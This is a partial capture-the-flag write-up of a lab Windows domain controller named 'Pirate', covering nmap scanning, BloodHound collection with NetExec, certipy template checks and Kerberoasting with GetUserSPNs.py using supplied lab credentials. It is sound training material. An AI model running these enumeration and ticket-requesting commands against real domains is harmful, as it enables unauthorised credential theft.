Myles Nieman
← All writeups

Pirate

Overview

Pirate is a hard Windows box exposing a domain controller (DC01.pirate.htb) with a set of starting pentest credentials. The intended entry point appears to be through the Active Directory environment — the notes cover initial BloodHound collection and Kerberoasting, but the crackable path was not resolved within the session documented here.

Path (partial): pentest creds → BloodHound → Kerberoast ADM / A.WHITE SPNs → (crack) → …

Enumeration

The nmap scan confirms a Windows domain controller. Notable ports are DNS (53), HTTP (80), Kerberos (88), LDAP (389/636/3268/3269), SMB (445), and RPC (593). The SSL certificate on LDAP pins the hostname to DC01.pirate.htb in the pirate.htb domain.

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb)
443/tcp  open  https
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      (Domain: pirate.htb, commonName=DC01.pirate.htb)
3268/tcp open  ldap
3269/tcp open  ssl/ldap
Service Info: Host: DC01; OS: Windows

Nmap scan of pirate.htb DC01

The box comes with starting credentials:

pentest / p3nt3st2025!&

Enumeration — BloodHound Collection

With valid credentials, BloodHound collection runs via NetExec’s built-in --bloodhound module (the Python bloodhound.py collector failed to ingest properly):

$ nxc ldap 10.129.7.69 -u pentest -p 'p3nt3st2025!&' -d pirate.htb \
    --bloodhound --collection All \
    --dns-server 10.129.7.69 --kdcHost 10.129.7.69

Checking for vulnerable ADCS certificate templates turns up nothing:

$ certipy find -u 'pentest@pirate.htb' -p 'p3nt3st2025!&' \
    -dc-ip 10.129.7.69 -vulnerable -stdout

certipy output — no vulnerable certificate templates

BloodHound identifies two Kerberoastable accounts:

BloodHound showing two Kerberoastable users

Kerberoasting

Both Kerberoastable SPNs are targeted — one of them appears to be ADM, with a possible secondary pivot to A.WHITE:

BloodHound path detail — ADM SPN and A.WHITE account

Requesting the service tickets:

$ GetUserSPNs.py pirate.htb/pentest:'p3nt3st2025!&' \
    -dc-ip 10.129.7.69 -request

GetUserSPNs output — tickets requested for Kerberoastable accounts

Offline cracking against standard wordlists did not recover the ADM hash.

Notes

Thin notes — the writeup ends at the Kerberoasting stage. The session ran out of steam after the ADM hash resisted rockyou.txt; no further pivots, credentials, or paths were documented. The full exploitation chain remains to be revisited.

Takeaways

  • Pre-supplied pentest credentials enable fast BloodHound collection — go straight to nxc ldap --bloodhound to avoid the Python collector’s ingest quirks.
  • Kerberoastable service accounts are only useful if the ticket cracks. Strong service-account passwords (or AES-only tickets) require larger wordlists or rule-based mangling before cracking succeeds.